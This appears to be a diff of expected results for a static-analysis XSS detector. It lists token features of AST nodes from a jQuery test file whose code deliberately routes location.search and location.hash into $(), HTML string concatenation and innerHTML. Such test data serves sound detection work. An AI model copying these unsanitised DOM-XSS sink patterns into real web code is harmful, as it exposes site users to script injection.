    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:1:1:35:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:1:10:1:13 | test | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:1:10:1:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:1:10:1:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:13 | tainted | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:13 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:13 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:13 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:13 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted ... .search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted ... .search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:7:2:40 | tainted ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:24 | document | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:24 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:24 | document | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:24 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:24 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:33 | document.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:33 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:33 | document.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:33 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:33 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:40 | documen ... .search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:40 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:40 | documen ... .search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:40 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:17:2:40 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:26:2:33 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:26:2:33 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:26:2:33 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:26:2:33 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:26:2:33 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:2:35:2:40 | search | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:2:35:2:40 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:2:35:2:40 | search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:2:35:2:40 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:2:35:2:40 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | $(tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | $(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | $(tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | $(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | $(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | exceptional return of $(tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | exceptional return of $(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | exceptional return of $(tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | exceptional return of $(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:4:3:4:12 | exceptional return of $(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | contextFunctionInterfaces | test() | @@ -13781,6 +102116,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:4:5:4:11 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | $("body", tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | $("body", tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | $("body", tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | $("body", tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | $("body", tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | exceptional return of $("body", tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | exceptional return of $("body", tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | exceptional return of $("body", tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | exceptional return of $("body", tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:5:3:5:20 | exceptional return of $("body", tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:5:5:5:10 | "body" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:5:5:5:10 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:5:5:5:10 | "body" | contextFunctionInterfaces | test() | @@ -13795,6 +102145,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:5:13:5:19 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:5:13:5:19 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:5:13:5:19 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | $("." + tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | $("." + tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | $("." + tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | $("." + tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | $("." + tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | exceptional return of $("." + tainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | exceptional return of $("." + tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | exceptional return of $("." + tainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | exceptional return of $("." + tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:6:3:6:18 | exceptional return of $("." + tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:7 | "." | stringConcatenatedWith | -endpoint- tainted | | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | contextFunctionInterfaces | test() | @@ -13802,12 +102173,38 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:6:5:6:17 | "." + tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:6:11:6:17 | tainted | stringConcatenatedWith | '.' -endpoint- | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | $("
    ") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | $("
    ") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | $("
    ") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | $("
    ") | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | exceptional return of $("
    ") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | exceptional return of $("
    ") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | exceptional return of $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:7:3:7:35 | exceptional return of $("
    ") | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:16 | "
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:16 | "
    ' | +| autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:26 | "
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:26 | "
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:34 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:7:5:7:34 | "
    " | contextFunctionInterfaces | test() | @@ -13827,6 +102224,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:7:30:7:34 | "\\">" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:7:30:7:34 | "\\">" | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:7:30:7:34 | "\\">" | stringConcatenatedWith | '
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | $("body") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | $("body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | $("body") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | $("body") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | $("body") | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | exceptional return of $("body") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | exceptional return of $("body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | exceptional return of $("body") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
